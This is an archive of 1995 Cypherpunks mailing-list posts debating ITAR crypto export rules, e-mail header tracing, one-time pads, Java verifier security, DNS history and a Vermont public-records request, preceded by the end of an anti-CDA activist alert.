>Jun 30, '95 Cox and Wyden introduce the "Internet Freedom and Family > Empowerment Act" (HR 1978) as an alternative to the CDA. >Jun 21, '95 Several prominent House members publicly announce their > opposition to the CDA, including Rep. Newt Gingrich (R-GA), > Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR). >Jun 14, '95 The Senate passes the CDA as attached to the Telecomm > reform bill (S 652) by a vote of 84-16. The Leahy bill > (S 714) is not passed. >May 24, '95 The House Telecomm Reform bill (HR 1555) leaves committee > in the House with the Leahy alternative attached to it, > thanks to Rep. Ron Klink of (D-PA). The Communications > Decency Act is not attached to it. >Apr 7, '95 Sen. Leahy (D-VT) introduces S.714, an alternative to > the Exon/Gorton bill, which commissions the Dept. of > Justice to study the problem to see if additional legislation > (such as the CDA) is necessary. >Mar 23, '95 S314 amended and attached to the telecommunications reform > bill by Sen. Gorton (R-WA). Language provides some provider > protection, but continues to infringe upon email privacy > and free speech. >Feb 21, '95 HR1004 referred to the House Commerce and Judiciary >committees >Feb 21, '95 HR1004 introduced by Rep. Johnson (D-SD) >Feb 1, '95 S314 referred to the Senate Commerce committee >Feb 1, '95 S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA). 
> >________________________________________________________________________ >FOR MORE INFORMATION > >Web Sites > URL:http://www.vtw.org/exon/ > URL:http://epic.org/ > URL:http://www.eff.org/pub/Alerts/ > URL:http://www.cdt.org/cda.html > URL:http://outpost.callnet.com/outpost.html > >FTP Archives > URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH > URL:ftp://ftp.eff.org/pub/Alerts/ > >Gopher Archives: > URL:gopher://gopher.panix.com/11/vtw/exon > URL:gopher://gopher.eff.org/11/Alerts > >Email: > vtw at vtw.org (put "send alert" in the subject line for the latest > alert, or "send cdafaq" for the CDA FAQ) > cda-info at cdt.org (General CDA information) > cda-stat at cdt.org (Current status of the CDA) > >________________________________________________________________________ >LIST OF PARTICIPATING ORGANIZATIONS > >In order to use the net more effectively, several organizations have >joined forces on a single Congressional net campaign to stop the >Communications Decency Act. > >American Civil Liberties Union * American Communication Association * >American Council for the Arts * Arts & Technology Society * Association >of Alternative Newsweeklies * biancaTroll productions * Boston >Coalition for Freedom of Expression * Californians Against Censorship >Together * Center For Democracy And Technology * Centre for Democratic >Communications * Center for Public Representation * Citizen's Voice - >New Zealand * Cloud 9 Internet *Computer Communicators Association * >Computel Network Services * Computer Professionals for Social >Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer >Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group, >Inc. 
* Electronic Frontier Canada * Electronic Frontier Foundation * >Electronic Frontier Foundation - Austin * Electronic Frontiers >Australia * Electronic Frontiers Houston * Electronic Frontiers New >Hampshire * Electronic Privacy Information Center * Feminists For Free >Expression * First Amendment Teach-In * Florida Coalition Against >Censorship * FranceCom, Inc. Web Advertising Services * Friendly >Anti-Censorship Taskforce for Students * Hands Off! The Net * Inland >Book Company * Inner Circle Technologies, Inc. * Inst. for Global >Communications * Internet On-Ramp, Inc. * Internet Users Consortium * >Joint Artists' and Music Promotions Political Action Committee * The >Libertarian Party * Marijuana Policy Project * Metropolitan Data >Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle >Greenway * National Campaign for Freedom of Expression * National >Coalition Against Censorship * National Gay and Lesbian Task Force * >National Public Telecomputing Network * National Writers Union * Oregon >Coast RISC * Panix Public Access Internet * People for the American Way >* Republican Liberty Caucus * Rock Out Censorship * Society for >Electronic Access * The Thing International BBS Network * The WELL * >Voters Telecommunications Watch > >(Note: All 'Electronic Frontier' organizations are independent entities, > not EFF chapters or divisions.) > >________________________________________________________________________ > End Alert >======================================================================== > > ******************************************************************** Lynne L. Harrison, Esq. Poughkeepsie, New York lharrison at mhv.net "Say not, 'I have found the truth', but rather, 'I have found a truth.'" - Kahlil Gibran from "The Prophet" ******************************************************************** From tcmay at got.net Mon Nov 6 21:27:17 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 7 Nov 1995 13:27:17 +0800 Subject: toolkits? 
Message-ID:

The most common typo (of any significance) I seem to make is leaving out the "not" in a strongly worded statement:

>You may have gotten no responses because it generally is not up to a state
>government to ensure that "mediocrity" in the Internet is avoided (though
>I'm not sure what is meant by "mediocrity." If it is security and
>anonymity, this is definitely the state government's responsibility, or
                              ^ not
>even area of interest.)

It's almost as if I'm "leaning on the horn" so much as I'm typing, that I leave out the all-important "not" modifier.

My apologies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hallam at w3.org Mon Nov 6 21:33:54 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 13:33:54 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <9511070341.AA15892@zorch.w3.org>

Perry chips in :

>"Peter D. Junger" writes:
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.

>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superseded by lower
>level laws, in spite of the supremacy clause of the constitution? That
That >might be what the state department would tell you, but I'd have >trouble believing even a lobotomized mongoloid judge would let that >stand. Treaties are treaties, period. Actually there are exclusion clauses in most international trade treaties to exclude items such as arms and drugs from transhipment clauses. There are also various treaties to control trafic in arms and drugs whose provisions may have precedence. The US is not known for sticking to the narrow wording of an international treaty in such cases. Panama was invaded for alledged transhipment of drugs after all. I doubt anyone would seriously attempt to find a justification for that act in international law. One of the many problems in Perry's approach is that an international treaty is in essence a contract between governments. If the governments chose to interpret a contract in a particular way they may not consider it any of your buisness as a third party. They are after all always free to negotiate a new treaty. Perry's somewhat offensive language is not a substitute for an argument. Treaties certainly arn't "treaties period" otherwise the profession of law would be a somewhat less skilled one. There is clearly considerable complexity in the interpretation of treaties and in determining the scope of their application, the various remedies they provide for and so on. I think I would take Perry's disbelief that a person is a lawyer becuse he disagrees with him as reflecting more on Perry than anyone else. All contrary views are rejected... hmm... Phill From adam at homeport.org Mon Nov 6 21:35:43 1995 From: adam at homeport.org (Adam Shostack) Date: Tue, 7 Nov 1995 13:35:43 +0800 Subject: using pgp to make an otp In-Reply-To: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET> Message-ID: <199511070407.XAA04557@homeport.org> amp wrote: | my point here is that _if_ pgp output is random enough, i wouldn't need | hardware. 
| even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as input for a stream cypher.

PGP output is not random enough to be used for a one time pad. The security of an OTP is *entirely* based on the quality of the random numbers; they should come from some strong generator. Building good one time pads is tough, and usually not worth the effort.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Mon Nov 6 21:37:01 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 13:37:01 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID:

"Perry E. Metzger" writes:

: I am starting to have trouble believing you are a lawyer. Are you
: actually telling me that treaties which explicitly indemnify
: transshipment customers against local laws are superseded by lower
: level laws, in spite of the supremacy clause of the constitution? That
: might be what the state department would tell you, but I'd have
: trouble believing even a lobotomized mongoloid judge would let that
: stand. Treaties are treaties, period.

What I am telling you, if you would pay attention, is that there is no transhipment involved. The violation of the ITAR consists of disclosing information, not shipment. And that is pretty clearly unconstitutional because it violates the first amendment, but it has nothing whatsoever to do with any treaties--certainly nothing to do with treaties about transhipment.

If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode to a German businessman there, that is literally a violation of the ITAR. If the disclosure is made by sending a copy of the software from one hotel room to another, and if that message happens to get routed through the United States, that is still a violation.
The fact that the message went through the United States is irrelevant.

Don't expect the ITAR to make any sense. And don't think that you can apply logic to the ITAR and get logical results. It doesn't work that way.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From sommerfeld at orchard.medford.ma.us Mon Nov 6 21:40:23 1995
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Tue, 7 Nov 1995 13:40:23 +0800
Subject: forging headers
In-Reply-To: <199511070255.VAA14851@jekyll.piermont.com>
Message-ID: <199511070353.DAA01678@orchard.medford.ma.us>

-----BEGIN PGP SIGNED MESSAGE-----

> You didn't send ALL the headers, only some of them. You need to send
> on the full set to make a trace possible.

More specifically, the headers which are most needed are the Received: and Message-Id: headers; each mailer along the path adds another Received: header, typically with its name, a timestamp, and sometimes the name or address of the previous system. Other headers may also help.

> Lee Tien writes:
> > So I got this message. How would someone identify the sender of this
> > message? I'm writing an article on anonymity, with some discussion of
> > remailers, and want to argue that forging already permits people to raise
> > the costs of tracing significantly, anonymous remailers or no.

- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMJ7YHrT+rHlVUGpxAQHfSgP/YDoEM9chlFLNZ1U4nzh6T13Lsswqv768
oTpssqzW+OYenKgop7FOGYIs7GpSdSGdgFyucYHlcBkUpVXOLMcs/pylwIVGy8Hl
T/lrsNEjAEBjWlzZO6jSuKvrODZKGGfn7nTvmmCR8vKRtUlLnK3ljK8VphqpYvbm
Nmg6okhczZM=
=JO4Z
-----END PGP SIGNATURE-----

From perry at piermont.com Mon Nov 6 22:06:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 14:06:55 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID: <199511070405.XAA14913@jekyll.piermont.com>

"Peter D.
Junger" writes:
> "Perry E. Metzger" writes:
>
> : I am starting to have trouble believing you are a lawyer. Are you
> : actually telling me that treaties which explicitly indemnify
> : transshipment customers against local laws are superseded by lower
> : level laws, in spite of the supremacy clause of the constitution? That
> : might be what the state department would tell you, but I'd have
> : trouble believing even a lobotomized mongoloid judge would let that
> : stand. Treaties are treaties, period.
>
> What I am telling you, if you would pay attention, is that there is no
> transhipment involved. The violation of the ITAR consists of
> disclosing information, not shipment.

Given that it is a non-U.S. national disclosing information to a non-U.S. national, both being outside the U.S.'s borders, with their only involvement with the U.S. being an incidental traversal of their communications via U.S. telecoms networks, I would say that it would be a case where the telecoms treaties would come into play.

> If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
> to a German businessman there, that is literally a violation of the
> ITAR.

Where the hell did you get that idea? The ITAR clearly does not apply to foreigners disclosing things to each other outside the United States. I've read it and I can't see how it could possibly be so interpreted. I'm not a lawyer, but this interpretation is so bizarre as to be almost untenable. I can clearly see that a U.S. person talking about DES to a foreign person can be a violation under the language in the regulations, but there is no way on earth to interpret the regulations as applying to foreigners abroad talking to other foreigners outside the U.S.

> Don't expect the ITAR to make any sense. And don't think that you can
> apply logic to the ITAR and get logical results. It doesn't work that
> way.

I was under the impression, though, that the words meant what they said.
Perry

From llurch at networking.stanford.edu Mon Nov 6 22:19:28 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Tue, 7 Nov 1995 14:19:28 +0800
Subject: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID:

On Mon, 6 Nov 1995, Damaged Justice wrote:

> My two cents: I've used Dejanews for almost a month now, and have been
> consistently impressed with the results. The uses are many; the danger,
> as others have noted, is that people forget (or never realize in the
> first place) that you should never post anything to Usenet that you
> wouldn't want to see plastered on the evening news.
>
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

I absitively agree. I have no quarrel with archiving and redistributing public information. I think it's great.

Might also help spread awareness of the anonymity options available. It would be good to see if the dejanews folks would give the anon servers a plug. Anybody friendly with them?

-rich

From shields at tembel.org Mon Nov 6 22:56:19 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 14:56:19 +0800
Subject: toolkits?
In-Reply-To: <199511070141.UAA15583@maple.sover.net>
Message-ID: <47moi5$ahc@yage.tembel.org>

In article <199511070141.UAA15583 at maple.sover.net>, Stephen Whitaker wrote:
> What constitutes a basic toolkit for trace route, sniff for promiscuous
> mode, all the other tools to map what's happening to net traffic in a little
> state of 1/2 million people? What are the sources of traffic information?

It won't help, because tapping wouldn't be done at the BGP4 level, but at the switch (if with telco cooperation) or directly on the lines.

*You need end-to-end encryption*. You need Kerberos or IPSEC.

--
Shields.
From bdolan at use.usit.net Mon Nov 6 22:59:04 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 7 Nov 1995 14:59:04 +0800
Subject: consumer products that make nice sources
In-Reply-To:
Message-ID:

On Fri, 3 Nov 1995, Timothy C. May wrote:

>
> I'd say they make poor sources. Far too large. A smaller source has better
> access to the detector without adding much to the overall background the
> user is exposed to. (I'm not saying low-level uranium or thorium sources
> are much of a hazard, but the fluence presented at the detector is very low
> for such an extended source.)
>
> It depends on the detector type (alpha, beta, gamma, neutrino?), but high
> count rates can be obtained in a variety of ways. (Don't get too high a
> count rate, or the dead time characteristics of the pulse-height analyzers
> will introduce spurious correlations that decrease entropy--I mention this
> to show that even radiation detector sources of entropy have non-random
> issues to take into account.)

Gotta watch yourself around the physicist....

Most of the sources I mentioned are fairly anemic, however the Coleman lantern mantles are pretty good beta emitters. I can get count rates approaching 1000 cpm on a tired GM tube detector with a beta window of unknown thickness.

Brad D.

From ses at tipper.oit.unc.edu Mon Nov 6 23:05:22 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Tue, 7 Nov 1995 15:05:22 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

On Mon, 6 Nov 1995, Peter D. Junger wrote:

>
> Don't blame this on my being a lawyer; blame it on some very sick
> people in the Office of Defense Trade Controls and in the NSA.
I think it's unfair to call the people at the ODTC and the NSA sick; during the cold war, such restrictions did make some sense; in particular, controlling the export of high-performance encryption hardware does make it harder for other countries to deploy ubiquitous strong encryption, particularly in the less developed countries, and particularly for chips that required exotic fabrication (the soviet union never had really good mass-production facilities).

Controlling software encryption without controlling publication never seemed to make that much sense, except that the lack of ubiquitous encryption probably allowed for lots of relatively non-sensitive intercepts that might otherwise have been impossible, and which may have been useful fuel for analysts.

However, now that the cold war is over, and now that fab plants are sprouting up all over the world, these restrictions make a lot less sense than they used to. Their main consequence is to restrict the deployment of strong cryptography world wide, including the United States. Strangely enough this would seem to hurt, not help, the NSA in the most important part of their current mission, which is to help protect US industry against industrial espionage and virtual terrorism, which is a far more pressing threat.

It's time for the policy makers at the NSA and GCHQ to realise that they won the war, give the appropriate people OBEs and knighthoods, allow the GCHQ to rejoin the civil service unions and apologise for the insult to their patriotism of their forcible de-unionisation, and above all, concentrate on fighting the real enemy - The French :-)

Simon

// Wow! Did I really just write all that. Next thing you know, I'll
// be saying something nice about Netscape.

p.s. I would expect the incoming Labour government to remove the ban on Union membership at GCHQ, with the old guaranteed non-strike agreement. I wonder how many other similar organisations allow employees to belong to unions?
I'd guess that the Israeli ones would, mainly because I can't imagine any major Israeli organisation not being unionised :-); I can't picture the CIA or NSA allowing collective bargaining ("America works best when you say Union 0w98bvchgfwer097").

From rsalz at osf.org Mon Nov 6 23:11:29 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 1995 15:11:29 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511070647.AA00471@sulphur.osf.org>

>Originally DNS was just a handy user-friendly thing, but then
>it became the primary way to name a host. This allowed the IP address
>to become irrelevant, which allows entire sites to be renumbered when the
>network topology changes. This is important to keep the routing tables
>small (by minimizing the backwards-compatibility exceptions), which is
>a critical problem today. Thus all recent architectural decisions have
>been away from direct use of IP addresses anywhere.

Hunh?

The Arpanet always used hostnames. Just about the only time you needed to specify a raw network address was when you were dialed into a TAC and you did things like "@o 137" to connect to mit-mc.

DNS was created because the hosts.txt file, a single network-wide file that listed the name, address, aliases, system type, etc., of every host in the Arpanet got to be unmaintainable.

Routing is totally unrelated to DNS, based as it is in IP addresses. Routers know nothing about DNS.

/r$

From rsalz at osf.org Mon Nov 6 23:33:17 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 1995 15:33:17 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <9511070710.AA00528@sulphur.osf.org>

> Strangely
>enough this would seem to hurt, not help, the NSA in the most important
>part of their current mission, which is to help protect US industry
>against industrial espionage and virtual terrorism, which is a far more
>pressing threat.
Matt's NATO adventures, for example, are an interesting example of what happens when the two missions -- "protect our secrets" and "read theirs" -- come into conflict. (Not unlike the US Dept of Agriculture.) Their open involvement in places like W3C, where Agency staff talk about getting Fortezza cards in COTS products provides another datapoint.

Budget cuts may turn out to be strong crypto's best friend.

/r$

From anonymous-remailer at shell.portal.com Mon Nov 6 23:49:53 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 7 Nov 1995 15:49:53 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05390@jobe.shell.portal.com>

On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> >
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue, vis-a-vis Java or any other paradigm which wishes to represent itself as *secure*.

Where is the security review role placed within the project development life cycle?? Is it at Design Concept? Or during Application Development? Or is it done last, after design completion, after all of the programming is complete and the production people are involved in operational turnover. Or is it done at all?

This concept is not new, and should not present any problems to anyone in the industry. Even John Q.
Public will understand it, if we use a simple construction analogy.

If you want to build a secure house, your security doesn't start AFTER the house is built. It has to start at a very early stage. It starts before the blueprints are made, when you specify that you want a concrete windowless box located on a quiet street at the end of a cul-de-sac. That is simple and obvious.

You certainly don't have *security* if after building a glass house on Main Street, if after the design is finished, the footings have been poured, and the key is about to be turned over to the occupant; if then, as an afterthought you put a single strong deadbolt on the front door to "secure" it.

Anyone who can't or won't quite grasp this idea is either willfully attempting to steer gullible individuals astray, or is congenitally stupid. It's time to call a spade a spade.

> What exactly does this mean?
>
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything.

Yikes!! I'll leave this for someone else to address. This sounds to me like a variation on virus scanning. I think that there are far more reputable virus experts than I who can comment and expand on *flaws* with that approach.

> No runtime checking whatsoever. Get past the supposed verifier, and you
> have free run of the machine. A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce.
As someone who *vividly* remembers October, 1987 and the near economic meltdown which was BARELY averted by the Fed, a near meltdown which occurred because of the interactions of systems far less intelligent or complex than those we routinely utilize today, systems which directly interface not only to each other, but have undocumented, non-predictable interactions with "soft and wet" systems, I might have some serious concerns.

Then again, it is _only_ the economy, isn't it?

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
>
> P.S.
>
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
>
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend. I've already got a local presentation that I've pencilled in for tomorrow morning at some god awfully early hour. Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification. Are you THE Dr. Frederick B. Cohen?? The one who originally coined the phrase "computer virus" and who maintains the computer virus FAQ? Are you THAT Dr. Frederick B. Cohen, and are you speaking publicly in Washington, tomorrow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the recent gaping security hole in the existing installed Navigator code base which I detailed to this list's subscribers. The one posted this last Friday the Thirteenth, that questioned Netscape's wisdom in creating an experimental MIME object which does not follow the usual HTTP request/response paradigm, but instead allows a server to open and maintain a bi-directional communications channel from server to client. Effectively a non-password protected telnet into the heart of any system, an open exploitable connection which penetrates proxy servers and firewalls, and acts as an enhanced bi-directional delivery/recovery mechanism?
I'd be very interested in the comments around that, especially since both Netscape and AT&T (who distributes the software under its own brand name) have made an explicit "no comment". I'd especially be interested in any post-session transcript.

I also think that Elaine Garzarelli might be interested. Especially since she'll be addressing the nation and the public via the public television airwaves this Friday evening. Or at least ... uhmmm ... I _think_ that's when her electronic daytimer has her pencilled in ...

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From stewarts at ix.netcom.com Tue Nov 7 16:50:14 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 7 Nov 95 16:50:14 PST
Subject: forging headers (with more header information)
Message-ID: <199511080049.QAA23866@ix4.ix.netcom.com>

>Without having any access to anything but the headers, it looks like
>you are an employee for SGI and sent the message from there.
>
>Look at the last Received: header. It went from sgi.com to mit.edu to
>well.com and then to you.

Obviously was forwarded from a remailer inside SGI ....

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From goedel at tezcat.com Tue Nov 7 01:13:04 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Tue, 7 Nov 1995 17:13:04 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>> > While all this checking appears excruciatingly detailed, by the time
>> > the byte code verifier has done its work, the Java interpreter can
>> > proceed knowing that the code will run securely. Knowing these
>> > properties makes the Java interpreter much faster, because it doesn't
>> > have to check anything.
>
>Yikes!! I'll leave this for someone else to address.
>This sounds to me like a variation on virus scanning. I think that there
>are far more reputable virus experts than I who can comment and expand on
>*flaws* with that approach.

This "checking," as any comp-sci undergrad will tell you, amounts to solving the halting problem for the java interpreter. While this is possible for a finite state automata like the java interpreter (made more difficult by the fact that it can use the "net" for additional state), it is not even remotely feasible.

If you can write a checker that works in a reasonable amount of time, I'll write a turing machine simulator that'll do something nasty if the input machine halts. Then we'll split the fame and fortune for solving the 5 state Busy Beaver problem. Deal?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMJ8gtXIf3YegbdiBAQGqMQJXWzwuPYM2bNb96Fgfb1wGeDC83fNFOW5H
8PQHbnt8bDFsHxKv2L8kcBhtO/TWA0cugVYR9YFf2BOaGoA2UIoCBdwfABM1HAKU
hd0H
=TA2E
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key
1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From shields at tembel.org Tue Nov 7 01:26:29 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 17:26:29 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511070647.AA00471@sulphur.osf.org>
Message-ID: <47n7m0$i3k@yage.tembel.org>

In article <9511070647.AA00471 at sulphur.osf.org>, Rich Salz wrote:
> >Originally DNS was just a handy user-friendly thing, but then [...]
> Hunh?
>
> The Arpanet always used hostnames.

Sorry. But still, the intent was to be user-friendly (right?), and a side effect was to make it possible to renumber without anyone noticing.

Renumbering didn't affect the health of the net until recently, with CIDR, where blocks of IP addresses could be aggregated arbitrarily.
A provider might now get 10.11.12/22 (i.e., a 22-bit-long prefix), and then assign customers 10.11.12/24, 10.11.13/23, &c., with only one entry in the backbone routing tables. To make this work you have to renumber when you change providers. Fortunately, we have DNS to provide a name more stable than the IP address.

That's the connection between DNS and routing, and it's why using names instead of numbers is Good.

--
Shields.

From ho at cs.arizona.edu Tue Nov 7 18:14:26 1995
From: ho at cs.arizona.edu (Hilarie Orman)
Date: Tue, 7 Nov 95 18:14:26 PST
Subject: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <9511080214.AA12812@uncial.CS.Arizona.EDU>

> Well, since we already require 56-bit DES in ESP in the interests of
> promoting basic interoperability, wouldn't a 512-bit prime be
> similarly sufficient?

If you are willing to accept that in all likelihood, one year from now, some group will announce that they can "crack" all key exchanges using the published modulus, then sure, call it sufficient.

There is certainly precedent; it was my understanding that Sun did not change their SecureRPC modulus when informed of LaMacchia and Odlyzko's work.

From whitaker at sover.net Tue Nov 7 18:21:28 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Tue, 7 Nov 95 18:21:28 PST
Subject: Electronic-reply issues
Message-ID: <199511080220.VAA14821@maple.sover.net>

[Key Words: public records; privacy; encryption; archives; Telecommunications Plan;]

November 7, 1995

Mr. Geoffrey Commons Esq.
Special Counsel
Vermont Department of Public Service
State Street
Montpelier, Vermont 05602

Dear Mr. Commons:

Thank you for your prompt reply to my document request. Yes, I will accept your electronic correspondence as your 'written' reply.
However, this brings up several good points which I would ask that you follow up on:

The receipt of an e-mail message does not, in and of itself, assure the recipient of the message's authenticity, privacy or preservation.

On the authentication issue, it is well known that the message headers are absolutely insufficient to authenticate the sender of a message. Digital technologies, using encryption, are required here.

Other issues are the privacy of the message along its long path between your desk and my office, and the record's later availability, _in electronic format_, if requested.

Regardless of the fact that we work only a thousand feet apart here in Montpelier, this message has probably traversed, _in clear text_, through Hartford CT., Albany NY., or Boston MA. prior to being exchanged between the so called 'gov-net' and sover.net.

Your reply has also probably been backed up to a tape at the DPS, combined with other exempt public records dealing with current regulatory litigation or consumer complaints. These storage procedures, or lack thereof, could serve to impede future access to these and other records by the public.

The original voice mail request and its written reply take on some form of public records status where, by statute, records must be cataloged so as to be locatable if requested, and archived for a certain period of time pursuant to an approved records retention schedule. Those schedules are approved by the director of public records, John Yacavoni.

It occurs to me that the DPS is required under the Vermont statutes governing the preparation of a Ten Year Telecommunications Plan, to analyze telecommunications technologies and the implication of their use in both the public and private arenas. The pertinent parts of the statute are included here for your convenience.
*******************begin_included_document****************************
30 VSA 202d

* * *

>(b) The department, through the director, shall prepare a telecommunications plan for the state. The plan shall be for a 10 year period and shall serve as a basis for state telecommunications policy. The plan shall include at a minimum:
> (1) an overview, looking ten years ahead, of statewide growth and development as they relate to future requirements for telecommunications services, including patterns of urban expansion, statewide and service area economic growth, shifts in transportation modes, economic development, technological advances and other trends and factors which, as determined by the director, will significantly affect state telecommunications policy and programs;
> (2) a survey of Vermont residents and businesses, conducted in cooperation with the agency of development and community affairs, to determine what telecommunications services are needed now and in the succeeding ten years;
> (3) a study and evaluation of conversion to measured service as ordered by the board;
> (4) an assessment of the current state telecommunications system and evaluation of alternative proposals for upgrading the system to provide the best available and affordable technology for use by government.
> (c) In developing the plan, the department shall take into account the policies and goals of section 202c of this title, and the need for basic service at affordable rates, improved competition among providers, the needs of the state as user of telecommunications services, and future development of the state.
*******************end_included_document***************************

It would then logically follow that a thorough analysis of these issues, which are not created by, but are certainly complicated by telecommunications technologies, should be included in the forthcoming Draft of that plan.
The department would then offer the citizens and the business community an opportunity to recommend changes or elaboration on those draft recommendations.

These should include, but are not limited to the use of digital signatures, authentication and encryption technologies, and last but not least EDI or Electronic Document Interchange.

These technologies are relevant to the state as a whole as far as positioning our citizens and businesses to participate in the rapidly emerging era of electronic commerce (where absolute privacy protections are essential), but are also immediately relevant to the gov-net/ school-net implementation, and even to the workings of your Department of Public Service and the quasi-judicial Public Service Board in order to enable electronic filings, to expedite the backlog of dockets and to answer official document requests.

As far as I know there is no other working group addressing these issues at present. Possibly your 'written' reply to my public records request, delivered via e-mail, will serve to catalyze such an effort in the context of a PSB-DPS working group (open to the public, of course) or in one of the amazingly effective forums in which your commissioner participates dealing with telecommunications.

One more question: was the voice mail message which I delivered to you, which certainly constitutes a record "created or acquired in the course of agency business", retained, cataloged and archived? Or, if it was destroyed, was it pursuant to an approved records retention schedule?

I recall the voice mail message to your Commissioner relating the Clyde River Dam negotiations which prompted a headline story and wish to emphasize the relevance of these new technologies and the management of public records.

I look forward to your thoughtful reply, or that of your Commissioner, Richard Sedano.

Now aren't you glad you use e-mail?
Sincerely,

Stephen Whitaker
Design Access Network
P.O.Box 1331
Montpelier, Vermont 05601-1331
whitaker at sover.net

At 06:22 PM 11/7/95 EDT, you wrote:
>November 7, 1995
>
>Dear Mr. Whitaker:
>
> I have today received your request (left on my voice mail
>yesterday, 11/6) to inspect certain documents. I understand your
>request to be for access to all staff analyses and internal or
>external correspondence regarding 9-1-1 costing or implementation,
>prepared or received by the Department of Public Service during
>calendar year 1995. Please let me know if I have misunderstood your
>message.
>
> I have relayed your request to all DPS staff, and we are in the
>process of collecting and reviewing responsive documents. Due to the
>length of time covered by your request, as well as its breadth, it will be
>a few days before I can be sure that I have collected and reviewed all
>responsive documents. Therefore, pursuant to 1 V.S.A. sec.
>318(a)(5)(B), I am advising you that I expect to make the requested
>documents available no later than Tuesday, November 14. If I can
>make them available earlier, or if unexpected delays are encountered,
